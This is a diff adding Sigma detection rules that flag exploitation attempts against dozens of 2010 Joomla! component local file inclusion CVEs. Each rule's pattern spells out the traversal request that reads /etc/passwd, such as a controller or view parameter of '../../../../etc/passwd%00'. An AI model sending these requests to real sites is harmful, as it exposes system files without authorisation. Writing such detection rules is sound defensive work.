https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-0985_exploitation_attempt.yaml b/rules/web/web_cve-2010-0985_exploitation_attempt.yaml new file mode 100644 index 00000000..13e1971a --- /dev/null +++ b/rules/web/web_cve-2010-0985_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-0985 exploitation attempt +id: 299f62c1-9e8a-43cc-b018-98d469f5654b +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component com_abbrev - Local File Inclusion:Directory traversal + vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! + allows remote attackers to include and execute arbitrary local files via a .. (dot + dot) in the controller parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1219_exploitation_attempt.yaml b/rules/web/web_cve-2010-1219_exploitation_attempt.yaml new file mode 100644 index 00000000..741d57a3 --- /dev/null +++ b/rules/web/web_cve-2010-1219_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1219 exploitation attempt +id: c72b9df0-2e24-4c59-a18d-2ce9f309011c +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component com_janews - Local File Inclusion:Directory traversal + vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote + attackers to read arbitrary local files via a .. (dot dot) in the controller parameter + to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1304_exploitation_attempt.yaml b/rules/web/web_cve-2010-1304_exploitation_attempt.yaml new file mode 100644 index 00000000..62c8e768 --- /dev/null +++ b/rules/web/web_cve-2010-1304_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1304 exploitation attempt +id: d43a3260-6661-4963-ae51-1516b410eab4 +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component User Status - Local File Inclusion:Directory traversal + vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 + for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in + the controller parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1305_exploitation_attempt.yaml b/rules/web/web_cve-2010-1305_exploitation_attempt.yaml new file mode 100644 index 00000000..ac18cb0a --- /dev/null +++ b/rules/web/web_cve-2010-1305_exploitation_attempt.yaml @@ -0,0 +1,25 @@ +title: CVE-2010-1305 exploitation attempt +id: 4ad4e3e9-c2ec-4f11-ae69-686317089de1 +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component JInventory 1.23.02 - Local File Inclusion:Directory + traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component + 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows + remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter + to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1306_exploitation_attempt.yaml b/rules/web/web_cve-2010-1306_exploitation_attempt.yaml new file mode 100644 index 00000000..8efdc7f9 --- /dev/null +++ b/rules/web/web_cve-2010-1306_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1306 exploitation attempt +id: 6eef2e17-dda2-4c9d-8e1f-9f28d02cbb68 +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component Picasa 2.0 - Local File Inclusion:Directory traversal + vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! + allows remote attackers to read arbitrary local files via a .. (dot dot) in the + controller parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1307_exploitation_attempt.yaml b/rules/web/web_cve-2010-1307_exploitation_attempt.yaml new file mode 100644 index 00000000..15558f07 --- /dev/null +++ b/rules/web/web_cve-2010-1307_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1307 exploitation attempt +id: 57eb5063-d907-440a-8194-6a304a2c33dc +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component Magic Updater - Local File Inclusion:Directory traversal + vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows + remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter + to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1308_exploitation_attempt.yaml b/rules/web/web_cve-2010-1308_exploitation_attempt.yaml new file mode 100644 index 00000000..bf0e78b5 --- /dev/null +++ b/rules/web/web_cve-2010-1308_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1308 exploitation attempt +id: 2ab1d26f-292d-48ef-b821-30000ca2d796 +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component SVMap 1.1.1 - Local File Inclusion:Directory traversal + vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote + attackers to read arbitrary files via a .. (dot dot) in the controller parameter + to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1312_exploitation_attempt.yaml b/rules/web/web_cve-2010-1312_exploitation_attempt.yaml new file mode 100644 index 00000000..8dff6589 --- /dev/null +++ b/rules/web/web_cve-2010-1312_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1312 exploitation attempt +id: 72d483b1-ef4e-4da4-a56b-d388d5fc55e4 +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component News Portal 1.5.x - Local File Inclusion:Directory + traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x + for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in + the controller parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1313_exploitation_attempt.yaml b/rules/web/web_cve-2010-1313_exploitation_attempt.yaml new file mode 100644 index 00000000..6722ac48 --- /dev/null +++ b/rules/web/web_cve-2010-1313_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1313 exploitation attempt +id: a9cfe674-5625-47c0-aa7b-ed19fb5aebc1 +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion:Directory + traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and + 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers + to read arbitrary files via a .. (dot dot) in the view parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1314_exploitation_attempt.yaml b/rules/web/web_cve-2010-1314_exploitation_attempt.yaml new file mode 100644 index 00000000..37a26d24 --- /dev/null +++ b/rules/web/web_cve-2010-1314_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1314 exploitation attempt +id: c54f2a94-b8eb-4b33-a430-f219b97a85e1 +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component Highslide 1.5 - Local File Inclusion:Directory traversal + vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! + allows remote attackers to read arbitrary files via a .. (dot dot) in the controller + parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1345_exploitation_attempt.yaml b/rules/web/web_cve-2010-1345_exploitation_attempt.yaml new file mode 100644 index 00000000..b26bd3bb --- /dev/null +++ b/rules/web/web_cve-2010-1345_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1345 exploitation attempt +id: a14d080c-2aa0-4d7b-bffd-06f0e325bd0c +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component Cookex Agency CKForms - Local File Inclusion:Directory + traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 + for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in + the controller parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1353_exploitation_attempt.yaml b/rules/web/web_cve-2010-1353_exploitation_attempt.yaml new file mode 100644 index 00000000..35fc5a28 --- /dev/null +++ b/rules/web/web_cve-2010-1353_exploitation_attempt.yaml @@ -0,0 +1,23 @@ +title: CVE-2010-1353 exploitation attempt +id: 9506788c-d0d6-4671-92b5-61a07cd5a056 +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component LoginBox - Local File Inclusion:Directory traversal + vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote + attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1354_exploitation_attempt.yaml b/rules/web/web_cve-2010-1354_exploitation_attempt.yaml new file mode 100644 index 00000000..c6044615 --- /dev/null +++ b/rules/web/web_cve-2010-1354_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1354 exploitation attempt +id: bf6bdfcf-7229-4812-8188-9c778d97ed63 +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component VJDEO 1.0 - Local File Inclusion:Directory traversal + vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows + remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter + to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1470_exploitation_attempt.yaml b/rules/web/web_cve-2010-1470_exploitation_attempt.yaml new file mode 100644 index 00000000..618ab28d --- /dev/null +++ b/rules/web/web_cve-2010-1470_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1470 exploitation attempt +id: 2b631e08-2471-4b98-a385-f420ebf1f406 +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component Web TV 1.0 - Local File Inclusion:Directory traversal + vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote + attackers to read arbitrary files and possibly have unspecified other impact via + a .. (dot dot) in the controller parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1471_exploitation_attempt.yaml b/rules/web/web_cve-2010-1471_exploitation_attempt.yaml new file mode 100644 index 00000000..6e082197 --- /dev/null +++ b/rules/web/web_cve-2010-1471_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1471 exploitation attempt +id: cb214df9-5948-4967-ba0b-4a5ad197313e +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component Address Book 1.5.0 - Local File Inclusion:Directory + traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for + Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the + controller parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1472_exploitation_attempt.yaml b/rules/web/web_cve-2010-1472_exploitation_attempt.yaml new file mode 100644 index 00000000..cb94d57c --- /dev/null +++ b/rules/web/web_cve-2010-1472_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1472 exploitation attempt +id: 9878af5a-91d9-474f-b4ff-4874db061c90 +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component Horoscope 1.5.0 - Local File Inclusion:Directory traversal + vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla! + allows remote attackers to read arbitrary files via a .. (dot dot) in the controller + parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1473_exploitation_attempt.yaml b/rules/web/web_cve-2010-1473_exploitation_attempt.yaml new file mode 100644 index 00000000..a7824e77 --- /dev/null +++ b/rules/web/web_cve-2010-1473_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1473 exploitation attempt +id: 09fe8c14-2dd6-4c16-9610-54e9762acd81 +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component Advertising 0.25 - Local File Inclusion:Directory traversal + vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows + remote attackers to read arbitrary files and possibly have unspecified other impact + via a .. (dot dot) in the controller parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1474_exploitation_attempt.yaml b/rules/web/web_cve-2010-1474_exploitation_attempt.yaml new file mode 100644 index 00000000..7d7dc15c --- /dev/null +++ b/rules/web/web_cve-2010-1474_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1474 exploitation attempt +id: 7d738208-638c-4e01-a694-b507cae881a6 +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component Sweetykeeper 1.5 - Local File Inclusion:Directory traversal + vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! + allows remote attackers to read arbitrary files and possibly have unspecified other + impact via a .. (dot dot) in the controller parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1475_exploitation_attempt.yaml b/rules/web/web_cve-2010-1475_exploitation_attempt.yaml new file mode 100644 index 00000000..4f733e47 --- /dev/null +++ b/rules/web/web_cve-2010-1475_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1475 exploitation attempt +id: c9db721a-f2c1-4e8a-8f6a-b31aa0e51374 +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion:Directory + traversal vulnerability in the Preventive & Reservation (com_preventive) component + 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have + unspecified other impact via a .. (dot dot) in the controller parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1476_exploitation_attempt.yaml b/rules/web/web_cve-2010-1476_exploitation_attempt.yaml new file mode 100644 index 00000000..17650b59 --- /dev/null +++ b/rules/web/web_cve-2010-1476_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1476 exploitation attempt +id: 65239f96-f508-4941-b537-7837471ddcad +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion:Directory + traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 + for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified + other impact via a .. (dot dot) in the view parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1494_exploitation_attempt.yaml b/rules/web/web_cve-2010-1494_exploitation_attempt.yaml new file mode 100644 index 00000000..bc6b7544 --- /dev/null +++ b/rules/web/web_cve-2010-1494_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1494 exploitation attempt +id: 2ab0992e-1f93-499b-b1e6-580b651c151e +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component AWDwall 1.5.4 - Local File Inclusion:Directory traversal + vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote + attackers to read arbitrary files via a .. (dot dot) in the controller parameter + to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1495_exploitation_attempt.yaml b/rules/web/web_cve-2010-1495_exploitation_attempt.yaml new file mode 100644 index 00000000..820bb00c --- /dev/null +++ b/rules/web/web_cve-2010-1495_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1495 exploitation attempt +id: 16173107-1da6-4bb0-884c-0113ca1bd22c +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component Matamko 1.01 - Local File Inclusion:Directory traversal + vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote + attackers to read arbitrary files via a .. (dot dot) in the controller parameter + to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1532_exploitation_attempt.yaml b/rules/web/web_cve-2010-1532_exploitation_attempt.yaml new file mode 100644 index 00000000..3b477e4e --- /dev/null +++ b/rules/web/web_cve-2010-1532_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1532 exploitation attempt +id: b0caca18-cbcd-4e57-8d26-5aa5ab1dae90 +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion:Directory + traversal vulnerability in the givesight PowerMail Pro (com_powermail) component + 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have + unspecified other impact via a .. (dot dot) in the controller parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1533_exploitation_attempt.yaml b/rules/web/web_cve-2010-1533_exploitation_attempt.yaml new file mode 100644 index 00000000..989feccd --- /dev/null +++ b/rules/web/web_cve-2010-1533_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1533 exploitation attempt +id: 900bac77-29fa-47d7-a2cc-a2b259e5aa34 +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component TweetLA 1.0.1 - Local File Inclusion:Directory traversal + vulnerability in the TweetLA (com_tweetla) component 1.0.1 for Joomla! allows remote + attackers to read arbitrary files via a .. (dot dot) in the controller parameter + to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1534_exploitation_attempt.yaml b/rules/web/web_cve-2010-1534_exploitation_attempt.yaml new file mode 100644 index 00000000..71b30ef2 --- /dev/null +++ b/rules/web/web_cve-2010-1534_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1534 exploitation attempt +id: 8315e276-a65f-4617-a32b-668d19b0dcf2 +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component Shoutbox Pro - Local File Inclusion:Directory traversal + vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote + attackers to read arbitrary files via a .. (dot dot) in the controller parameter + to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1535_exploitation_attempt.yaml b/rules/web/web_cve-2010-1535_exploitation_attempt.yaml new file mode 100644 index 00000000..6c1045d0 --- /dev/null +++ b/rules/web/web_cve-2010-1535_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1535 exploitation attempt +id: c0e76601-93b3-4ccf-9d62-95c083ea375d +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion:Directory traversal + vulnerability in the TRAVELbook (com_travelbook) component 1.0.1 for Joomla! allows + remote attackers to read arbitrary files and possibly have unspecified other impact + via a .. (dot dot) in the controller parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1601_exploitation_attempt.yaml b/rules/web/web_cve-2010-1601_exploitation_attempt.yaml new file mode 100644 index 00000000..c414ea49 --- /dev/null +++ b/rules/web/web_cve-2010-1601_exploitation_attempt.yaml @@ -0,0 +1,23 @@ +title: CVE-2010-1601 exploitation attempt +id: ceac625a-0a44-4cab-ba06-1d0d6cacfd89 +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component JA Comment - Local File Inclusion:Directory traversal + vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote + attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1602_exploitation_attempt.yaml b/rules/web/web_cve-2010-1602_exploitation_attempt.yaml new file mode 100644 index 00000000..8bc9d320 --- /dev/null +++ b/rules/web/web_cve-2010-1602_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1602 exploitation attempt +id: 63b0013c-c10d-4f45-a0f5-b918514d6721 +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion:Directory + traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for + Joomla! allows remote attackers to read arbitrary files and possibly have unspecified + other impact via a .. (dot dot) in the controller parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1607_exploitation_attempt.yaml b/rules/web/web_cve-2010-1607_exploitation_attempt.yaml new file mode 100644 index 00000000..88e7fa06 --- /dev/null +++ b/rules/web/web_cve-2010-1607_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1607 exploitation attempt +id: fc8d65e0-cbed-434d-b881-28aa0346d408 +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component WMI 1.5.0 - Local File Inclusion:Directory traversal + vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) + component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary + local files via a .. (dot dot) in the controller parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1657_exploitation_attempt.yaml b/rules/web/web_cve-2010-1657_exploitation_attempt.yaml new file mode 100644 index 00000000..2dd7914c --- /dev/null +++ b/rules/web/web_cve-2010-1657_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1657 exploitation attempt +id: c32f0956-77ec-4875-8c3b-a84836f489a2 +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component SmartSite 1.0.0 - Local File Inclusion:Directory traversal + vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows + remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter + to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git 